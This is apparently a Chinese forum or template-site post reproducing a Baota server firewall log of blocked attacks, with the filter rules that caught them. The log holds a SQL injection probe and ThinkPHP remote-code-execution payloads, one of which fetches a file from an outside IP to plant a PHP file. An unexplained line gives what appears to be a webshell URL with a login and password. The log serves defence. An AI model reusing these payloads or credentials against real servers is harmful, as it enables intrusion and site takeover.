服務器寶塔入侵記錄 防火墻鏈接 這些都是軟件掃的
類型 GET 過濾器 args
URI地址
/webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20MD5(5200172853)--
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
過濾規則
(?:(union(.*?)select))
傳入值
site_id:-1159 UNION ALL SELECT MD5(5200172853)--
風險值
UNION ALL SELECT
類型 GET 過濾器 args
URI地址
/?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=copy&vars%5B1%5D%5B%5D=http://61.147.93.58:8888/down/W3kmfQKBexjv&vars%5B1%5D%5B%5D=.admin_cc.php
User-Agent
python-requests/2.24.0
過濾規則
(invokefunction|call_user_func_array|\\think\\)
傳入值
function:call_user_func_array
風險值
call_user_func_array
類型 POST 過濾器 post
URI地址
//index.php?s=/admin/upload/uploadfile
User-Agent
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.9 Safari/537.36
過濾規則
http包非法,并且被封鎖IP,如果自定義了from-data可能會導致誤報。如果大量出現當前問題。可以選擇在全局設置中關閉From-data協議22
類型 POST 過濾器 post
URI地址
//?s=captcha&test=-1
User-Agent
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
過濾規則
攔截ThinkPHP 5.x RCE 攻擊,并且被封鎖IP
yanhanmetals.com/147.php admin Aa147258
如果您的問題還未解決可以聯系站長付費協助。
有問題可以加入技術QQ群一起交流學習
本站vip會員 請加入無憂模板網 VIP群(50604020) PS:加入時備注用戶名或昵稱
普通注冊會員或訪客 請加入無憂模板網 技術交流群(50604130)
客服微信號:15898888535
聲明:本站所有文章資源內容,如無特殊說明或標注,均為采集網絡資源。如若內容侵犯了原著者的合法權益,可聯系站長刪除。
